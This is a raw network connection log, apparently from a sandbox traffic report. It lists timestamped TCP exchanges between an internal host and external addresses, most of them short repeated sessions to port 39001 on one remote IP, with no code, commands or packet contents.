Sep 19, 2024 02:27:28.885538101 CEST	39001	49879	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:29.503580093 CEST	39001	49879	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:29.503654003 CEST	49879	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:29.503794909 CEST	49879	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:29.508639097 CEST	39001	49879	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:29.625669956 CEST	49880	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:29.630712032 CEST	39001	49880	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:29.630781889 CEST	49880	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:29.758516073 CEST	49880	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:29.763406038 CEST	39001	49880	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:29.763472080 CEST	49880	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:29.768321991 CEST	39001	49880	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:30.287669897 CEST	39001	49880	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:30.290244102 CEST	49880	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:30.469803095 CEST	49880	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:30.474605083 CEST	39001	49880	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:30.576738119 CEST	49881	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:30.581556082 CEST	39001	49881	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:30.581656933 CEST	49881	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:30.628211021 CEST	49881	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:30.632971048 CEST	39001	49881	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:30.634212971 CEST	49881	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:30.639029026 CEST	39001	49881	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.210943937 CEST	39001	49881	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.211030006 CEST	49881	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.211112976 CEST	49881	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.219631910 CEST	39001	49881	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.326325893 CEST	49882	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.341193914 CEST	39001	49882	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.341284037 CEST	49882	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.387361050 CEST	49882	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.394153118 CEST	39001	49882	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.394208908 CEST	49882	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.401134968 CEST	39001	49882	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.971362114 CEST	39001	49882	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:31.971460104 CEST	49882	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.971529007 CEST	49882	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:31.977370024 CEST	39001	49882	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.075845957 CEST	49883	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.080864906 CEST	39001	49883	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.080950022 CEST	49883	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.142950058 CEST	49883	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.147794962 CEST	39001	49883	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.150243998 CEST	49883	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.155002117 CEST	39001	49883	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.752108097 CEST	39001	49883	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.753083944 CEST	49883	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.753182888 CEST	49883	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.761097908 CEST	39001	49883	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.856959105 CEST	49884	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.861785889 CEST	39001	49884	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.865291119 CEST	49884	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.895155907 CEST	49884	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.908551931 CEST	39001	49884	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:32.908616066 CEST	49884	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:32.913662910 CEST	39001	49884	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:33.521720886 CEST	39001	49884	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:33.521785975 CEST	49884	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:33.521955013 CEST	49884	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:33.526772022 CEST	39001	49884	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:33.638375998 CEST	49885	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:33.643316984 CEST	39001	49885	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:33.643409014 CEST	49885	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:33.716525078 CEST	49885	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:33.728255033 CEST	39001	49885	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:33.728349924 CEST	49885	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:33.741415024 CEST	39001	49885	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:34.327256918 CEST	39001	49885	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:34.327325106 CEST	49885	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:34.327474117 CEST	49885	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:34.332218885 CEST	39001	49885	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:34.435563087 CEST	49886	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:34.440397978 CEST	39001	49886	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:34.440486908 CEST	49886	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.162419081 CEST	49886	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.367484093 CEST	39001	49886	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:35.367557049 CEST	49886	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.372370958 CEST	39001	49886	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:35.694231033 CEST	39001	49886	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:35.694319010 CEST	49886	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.694417000 CEST	49886	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.699184895 CEST	39001	49886	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:35.810240984 CEST	49887	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.815169096 CEST	39001	49887	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:35.815263033 CEST	49887	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.845088005 CEST	49887	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.850092888 CEST	39001	49887	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:35.850167036 CEST	49887	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:35.854964972 CEST	39001	49887	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:36.453799963 CEST	39001	49887	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:36.453896999 CEST	49887	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:36.454052925 CEST	49887	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:36.464142084 CEST	39001	49887	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:36.560174942 CEST	49888	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:36.565047979 CEST	39001	49888	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:36.565140009 CEST	49888	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:36.611845016 CEST	49888	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:36.616903067 CEST	39001	49888	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:36.616982937 CEST	49888	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:36.621798038 CEST	39001	49888	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:37.223598003 CEST	39001	49888	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:37.223697901 CEST	49888	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:37.224759102 CEST	49888	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:37.229526997 CEST	39001	49888	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:37.342529058 CEST	49889	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:37.349778891 CEST	39001	49889	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:37.349857092 CEST	49889	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.015053988 CEST	49889	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.020035028 CEST	39001	49889	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:38.020129919 CEST	49889	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.025058985 CEST	39001	49889	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:38.329988956 CEST	39001	49889	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:38.330071926 CEST	49889	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.330188036 CEST	49889	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.335093021 CEST	39001	49889	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:38.435168982 CEST	49890	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.441468000 CEST	39001	49890	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:38.441576004 CEST	49890	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.465507984 CEST	49890	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.470370054 CEST	39001	49890	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:38.470454931 CEST	49890	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:38.475276947 CEST	39001	49890	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:39.087882996 CEST	39001	49890	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:39.088352919 CEST	49890	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:39.088445902 CEST	49890	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:39.093359947 CEST	39001	49890	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:39.200777054 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:39.206047058 CEST	39001	49891	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:39.208297014 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:39.242777109 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:39.252365112 CEST	39001	49891	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:39.252469063 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:39.257390022 CEST	39001	49891	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:39.353859901 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:27:39.465651989 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:27:40.446024895 CEST	39001	49891	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:40.446196079 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.446281910 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.446891069 CEST	39001	49891	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:40.446952105 CEST	49891	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.451163054 CEST	39001	49891	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:40.560157061 CEST	49892	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.565411091 CEST	39001	49892	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:40.565517902 CEST	49892	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.601269007 CEST	49892	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.606415987 CEST	39001	49892	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:40.606479883 CEST	49892	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:40.611351013 CEST	39001	49892	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.210212946 CEST	39001	49892	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.213272095 CEST	49892	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.213386059 CEST	49892	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.218272924 CEST	39001	49892	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.325695038 CEST	49893	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.330729008 CEST	39001	49893	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.332570076 CEST	49893	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.381418943 CEST	49893	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.386214972 CEST	39001	49893	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.388444901 CEST	49893	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.393239021 CEST	39001	49893	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.970067978 CEST	39001	49893	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:41.970172882 CEST	49893	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.970269918 CEST	49893	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:41.975116968 CEST	39001	49893	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.077069044 CEST	49894	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.083887100 CEST	39001	49894	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.083961964 CEST	49894	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.109324932 CEST	49894	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.115644932 CEST	39001	49894	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.115708113 CEST	49894	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.121124983 CEST	39001	49894	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.769200087 CEST	39001	49894	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.769306898 CEST	49894	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.769504070 CEST	49894	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.775331974 CEST	39001	49894	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.872905016 CEST	49895	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.880592108 CEST	39001	49895	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.880680084 CEST	49895	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.909351110 CEST	49895	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.914541006 CEST	39001	49895	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:42.914611101 CEST	49895	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:42.919421911 CEST	39001	49895	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:43.511774063 CEST	39001	49895	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:43.511863947 CEST	49895	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:43.512022018 CEST	49895	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:43.523981094 CEST	39001	49895	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:43.622955084 CEST	49896	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:43.627959013 CEST	39001	49896	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:43.628041029 CEST	49896	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:43.661297083 CEST	49896	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:43.666934013 CEST	39001	49896	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:43.666991949 CEST	49896	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:43.672647953 CEST	39001	49896	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.255708933 CEST	39001	49896	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.255776882 CEST	49896	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.256020069 CEST	49896	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.260853052 CEST	39001	49896	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.373030901 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.378360987 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.378444910 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.440283060 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.445709944 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.445779085 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.457694054 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.582844019 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.587668896 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:44.587732077 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:44.592564106 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.000621080 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.000754118 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.000986099 CEST	49897	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.005712986 CEST	39001	49897	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.107124090 CEST	49898	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.112257004 CEST	39001	49898	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.116525888 CEST	49898	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.161185026 CEST	49898	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.166146994 CEST	39001	49898	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.168818951 CEST	49898	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.173738003 CEST	39001	49898	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.812819958 CEST	39001	49898	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.812916994 CEST	49898	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.813179016 CEST	49898	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.824389935 CEST	39001	49898	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.919543982 CEST	49899	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.924642086 CEST	39001	49899	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.924721003 CEST	49899	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.959745884 CEST	49899	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.966146946 CEST	39001	49899	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:45.966217041 CEST	49899	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:45.974108934 CEST	39001	49899	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:46.724430084 CEST	39001	49899	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:46.724524975 CEST	49899	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:46.724625111 CEST	49899	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:46.735333920 CEST	39001	49899	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:46.841602087 CEST	49900	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:46.849114895 CEST	39001	49900	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:46.849189043 CEST	49900	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.006287098 CEST	49900	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.015280962 CEST	39001	49900	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:47.015398026 CEST	49900	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.020355940 CEST	39001	49900	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:47.499861956 CEST	39001	49900	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:47.500068903 CEST	49900	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.500068903 CEST	49900	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.505135059 CEST	39001	49900	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:47.607144117 CEST	49901	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.612173080 CEST	39001	49901	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:47.612262011 CEST	49901	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.651793003 CEST	49901	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.657855034 CEST	39001	49901	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:47.657911062 CEST	49901	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:47.662837029 CEST	39001	49901	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:48.283658028 CEST	39001	49901	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:48.283724070 CEST	49901	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:48.283864975 CEST	49901	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:48.288680077 CEST	39001	49901	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:48.388905048 CEST	49902	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:48.393832922 CEST	39001	49902	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:48.393928051 CEST	49902	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:48.477264881 CEST	49902	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:48.486303091 CEST	39001	49902	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:48.490343094 CEST	49902	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:48.495146036 CEST	39001	49902	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.050088882 CEST	39001	49902	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.053668022 CEST	49902	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.053668022 CEST	49902	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.058554888 CEST	39001	49902	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.169542074 CEST	49903	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.180140018 CEST	39001	49903	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.181747913 CEST	49903	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.220947981 CEST	49903	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.226461887 CEST	39001	49903	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.230606079 CEST	49903	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.236109018 CEST	39001	49903	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.815782070 CEST	39001	49903	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.815907001 CEST	49903	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.815954924 CEST	49903	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.820758104 CEST	39001	49903	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.939012051 CEST	49904	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.944118023 CEST	39001	49904	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.944195032 CEST	49904	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.988329887 CEST	49904	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.993293047 CEST	39001	49904	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:49.993366957 CEST	49904	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:49.998209953 CEST	39001	49904	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:50.571846008 CEST	39001	49904	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:50.571995020 CEST	49904	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:50.572053909 CEST	49904	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:50.577097893 CEST	39001	49904	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:50.685323954 CEST	49905	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:50.690485954 CEST	39001	49905	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:50.690571070 CEST	49905	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:50.720122099 CEST	49905	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:50.725738049 CEST	39001	49905	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:50.725815058 CEST	49905	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:50.730741024 CEST	39001	49905	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.345900059 CEST	39001	49905	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.346060038 CEST	49905	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.346164942 CEST	49905	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.350977898 CEST	39001	49905	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.450849056 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.455976963 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.456070900 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.545799017 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.550712109 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.550766945 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.555527925 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.619836092 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.624805927 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:51.626266956 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:51.631129026 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.092380047 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.092437983 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.092621088 CEST	49906	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.097457886 CEST	39001	49906	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.201057911 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.206300020 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.206410885 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.234210014 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.239125967 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.239197016 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.244074106 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.313155890 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.318155050 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.318233967 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.323031902 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.400718927 CEST	49907	39001	192.168.2.5	45.11.229.96
